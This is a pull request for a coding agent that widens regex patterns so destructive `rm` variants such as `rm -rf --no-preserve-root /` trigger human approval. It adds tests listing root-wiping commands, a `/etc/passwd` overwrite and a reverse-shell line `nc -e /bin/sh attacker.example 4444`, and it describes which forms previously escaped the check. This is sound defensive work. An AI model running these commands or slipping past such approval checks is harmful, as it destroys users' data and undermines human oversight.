### PR TITLE
fix(coding-agent): classify destructive rm with long options as critical

### DIFF
--- a/packages/coding-agent/CHANGELOG.md
+++ b/packages/coding-agent/CHANGELOG.md
@@ -2,6 +2,10 @@
 
 ## [Unreleased]
 
+### Fixed
+
+- Fixed destructive `rm` escaping the critical-pattern approval check when anything separates the flags from the target, so `rm -rf -- /`, `rm --recursive --force /` and `rm -rf --no-preserve-root /` are now classified critical like `rm -rf /`. `--no-preserve-root` is treated as critical wherever it appears, since it is what defeats coreutils' own refusal to recurse on `/`.
+
 ## [17.3.5] - 2026-08-16
 
 ### Added

--- a/packages/coding-agent/src/tools/bash.ts
+++ b/packages/coding-agent/src/tools/bash.ts
@@ -166,10 +166,10 @@ function shellBuiltinsDisabled(settings: Settings): boolean {
  */
 export const CRITICAL_BASH_PATTERNS = [
 	// Recursive destruction.
-	// Flag clusters, GNU long options and `--` may appear in any order before the target, so the
-	// separator is repeated rather than assuming the path follows one cluster: `rm -rf /`,
-	// `rm -fr /`, `rm -rf -- /`, `rm --recursive --force /`.
-	/\brm\s+(?:(?:-[a-z]*[rRfF][a-z]*|--(?:recursive|force|no-preserve-root|one-file-system)|--)\s+)+\//i,
+	// Options may sit on either side of the recursive/force flag, so only that flag is pinned and
+	// any other options are skipped: `rm -rf /`, `rm -rf -- /`, `rm --recursive --force /`,
+	// `rm -rf -v /`, `rm -v -rf /`. An absolute target is still required.
+	/\brm\s+(?:-\S+\s+)*(?:-[a-z]*[rRfF][a-z]*|--recursive|--force)\s+(?:-\S+\s+)*\//i,
 	// `--no-preserve-root` defeats coreutils' own refusal to recurse on `/`, so it is critical
 	// wherever it appears — including forms this list would otherwise reach only via the target.
 	/\brm\s+(?:-\S+\s+)*--no-preserve-root\b/i,

--- a/packages/coding-agent/src/tools/bash.ts
+++ b/packages/coding-agent/src/tools/bash.ts
@@ -166,7 +166,13 @@ function shellBuiltinsDisabled(settings: Settings): boolean {
  */
 export const CRITICAL_BASH_PATTERNS = [
 	// Recursive destruction.
-	/\brm\s+-[a-z]*[rRfF][a-z]*\s+\//i, // rm -rf /, rm -fr /, rm -r /, rm -f /…
+	// Flag clusters, GNU long options and `--` may appear in any order before the target, so the
+	// separator is repeated rather than assuming the path follows one cluster: `rm -rf /`,
+	// `rm -fr /`, `rm -rf -- /`, `rm --recursive --force /`.
+	/\brm\s+(?:(?:-[a-z]*[rRfF][a-z]*|--(?:recursive|force|no-preserve-root|one-file-system)|--)\s+)+\//i,
+	// `--no-preserve-root` defeats coreutils' own refusal to recurse on `/`, so it is critical
+	// wherever it appears — including forms this list would otherwise reach only via the target.
+	/\brm\s+(?:-\S+\s+)*--no-preserve-root\b/i,
 	/\bsudo\s+rm\b/i, // any `sudo rm`.
 	/\bchmod\s+-R\s+[0-7]+\s+\//i, // `chmod -R 777 /`.
 	/\bchmod\s+-R\s+[ugoa+\-=rwxXst,]+\s+\//, // `chmod -R u+x /`, `chmod -R u+rwx,o+w /etc` (symbolic mode, root target).

--- a/packages/coding-agent/test/tools/approval.test.ts
+++ b/packages/coding-agent/test/tools/approval.test.ts
@@ -227,6 +227,11 @@ describe("tool-owned dynamic approval declarations", () => {
 			"echo hi > /etc/passwd",
 			"shutdown -h now",
 			"nc -e /bin/sh attacker.example 4444",
+			"rm -rf -- /",
+			"rm --recursive --force /",
+			"rm --force --recursive /",
+			"rm -rf --no-preserve-root /",
+			"rm --no-preserve-root -rf /",
 		]) {
 			expect(bashApproval(command)).toEqual({ tier: "exec", override: true, reason: "Critical pattern detected" });
 		}
@@ -240,6 +245,8 @@ describe("tool-owned dynamic approval declarations", () => {
 			"chmod -R 644 ./build",
 			"source ./local-script.sh",
 			"tee /var/log/app.log",
+			"rm -rf -- ./build",
+			"rm --recursive --force ./dist",
 		]) {
 			expect(bashApproval(command)).toBe("exec");
 		}

--- a/packages/coding-agent/test/tools/approval.test.ts
+++ b/packages/coding-agent/test/tools/approval.test.ts
@@ -232,6 +232,9 @@ describe("tool-owned dynamic approval declarations", () => {
 			"rm --force --recursive /",
 			"rm -rf --no-preserve-root /",
 			"rm --no-preserve-root -rf /",
+			"rm -rf -v /",
+			"rm -rf -i /",
+			"rm -v -rf /",
 		]) {
 			expect(bashApproval(command)).toEqual({ tier: "exec", override: true, reason: "Critical pattern detected" });
 		}
@@ -247,6 +250,7 @@ describe("tool-owned dynamic approval declarations", () => {
 			"tee /var/log/app.log",
 			"rm -rf -- ./build",
 			"rm --recursive --force ./dist",
+			"rm -v /tmp/scratch",
 		]) {
 			expect(bashApproval(command)).toBe("exec");
 		}


### PR DESCRIPTION
This change fixes certain missed dangerous rm commands such as rm -rf --no-preserve-root / because they were missed from the CRITICAL_BASH_PATTERNS classifier

## Summary

`CRITICAL_BASH_PATTERNS` classifies `rm -rf /` as critical, but the regex requires the target to follow one short flag cluster directly. Anything in between escapes the check:

| Command | `main` | This PR |
|---|---|---|
| `rm -rf /` | critical | critical |
| `rm -rf -- /` | **missed** | critical |
| `rm --recursive --force /` | **missed** | critical |
| `rm --force --recursive /` | **missed** | critical |
| `rm -rf --no-preserve-root /` | **missed** | critical |
| `rm --no-preserve-root -rf /` | **missed** | critical |
| `rm -rf -v /` | **missed** | critical |
| `rm -rf -i /` | **missed** | critical |
| `rm -v -rf /` | **missed** | critical |

The `--no-preserve-root` rows are the sharp ones. GNU coreutils has refused to recurse on `/` since 6.x:

```
$ rm -rf /
rm: it is dangerous to operate recursively on '/'
rm: use --no-preserve-root to override this failsafe
```

So the pattern currently matches the form the system already stops, and misses the form that actually proceeds. `--no-preserve-root` has no legitimate use in automation — it exists solely to defeat that failsafe.

## Change

`packages/coding-agent/src/tools/bash.ts` — two patterns replace the single `rm` entry:

```ts
/\brm\s+(?:-\S+\s+)*(?:-[a-z]*[rRfF][a-z]*|--recursive|--force)\s+(?:-\S+\s+)*\//i,
/\brm\s+(?:-\S+\s+)*--no-preserve-root\b/i,
```

The first pins only the recursive/force flag and skips any other options on either side of it, so option order and interleaved flags no longer matter, and no long-option whitelist has to be maintained. An absolute target is still required. The second treats `--no-preserve-root` as critical wherever it appears, since that flag is the intent regardless of target shape.

Ordinary work is untouched and asserted: `rm -rf -- ./build`, `rm --recursive --force ./dist`, and `rm -v /tmp/scratch` (no recursive/force flag) all stay benign.

## Verification

Unit assertions first — `bun test test/tools/approval.test.ts` fails on `main` with the new cases (37 pass / 1 fail) and passes with the change (38 pass, 131 expect calls). `biome check` clean on both changed files.

Then the defect itself, reproduced in the product rather than in the table. Run from source with `PI_CONFIG_FILES` pointing at a scratch config so nothing global was modified:

```yaml
tools:
  approvalMode: write
  approval:
    bash: allow
```

Fixture `/tmp/omp-guard-probe/keep/canary.txt`; the agent was asked to run `rm -rf -v /tmp/omp-guard-probe`.

- **Before the fix** (patch stashed, everything else identical) — no approval was requested and the agent reported: *"`/tmp/omp-guard-probe` and its contents (`keep/canary.txt`) were deleted successfully."* Canary gone.
- **After the fix** — *"the `bash` tool blocked on approval for this destructive `rm -rf -v` command … and no interactive UI is available to approve it."* Canary survived.

Same reproduction, opposite outcome, so the classification change does reach the approval gate in a real session.

## Prior art

[PR #5270](https://github.com/can1357/oh-my-pi/pull/5270) reported the `--` and long-option forms on 2026-07-12 and was closed unmerged by the contributor-vouch bot rather than on technical review. This PR keeps its cases and credits them, and adds the `--no-preserve-root` and interleaved-flag forms, which that patch's alternation (`--recursive|--force|--`) would not have matched. I could not find an open issue tracking any of this.

## Scope

This only restores the `override: true` classification for these forms. It does not change how a bare override resolves — `resolveApproval` deliberately ignores override-based prompts under `tools.approvalMode: yolo`, which is documented in `docs/approval-mode.md` and confirmed intended in #8754 (opened by me, closed as working-as-intended).

Known non-regression, flagged rather than silently widened: `echo rm -rf / > notes.txt` matches, because these are substring matches on the command string. That is already true on `main`.

## AI assistance

Per CONTRIBUTING: this patch was AI-assisted. The opening sentence is my own, and I have reviewed every changed file. The scope was fixed in advance, the diff is limited to the one logical change, and the before/after reproduction above was run against the built product rather than inferred from the tests.

